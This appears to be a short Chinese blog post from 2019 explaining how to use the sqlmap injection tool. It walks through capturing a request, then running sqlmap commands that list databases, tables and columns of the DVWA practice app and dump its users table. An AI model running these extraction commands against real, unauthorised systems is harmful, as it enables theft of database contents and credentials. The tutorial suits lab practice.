sqlmap

作者: ESE_ | 来源:发表于2019-03-08 15:13 被阅读0次

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了

windows使用

Windows10
Fiddler2
sqlmap
python3

1、利用Burpsuite或者Fiddler抓取数据包,命名为1.txt
2、将数据包放在sqlmap的文件夹下,运行python sqlmap.py -r 1.txt.某个参数python sqlmap.py -r 1.txt -p username

linux使用步骤

1、将抓取的数据包保存为文件[如:11]


url

2、运行sqlmap跑文件--->sqlmap -r 11 --dbs

sqlmap
注:sqlmap.py -r 1.txt -p uname[-p:指定注入参数]

3、列举数据库表中的表--->sqlmap -r 11 --tables -D dvwa

tables

4、列举数据库表中的字段--->sqlmap -r 11 --columns -T users -D dvwa

columns

5、获取整个表的数据--->sqlmap -r 11 --dump -T users -D dvwa

dump

6、使用手册

相关文章

网友评论

      本文标题:sqlmap

      本文链接:https://www.haomeiwen.com/subject/jvsrpqtx.html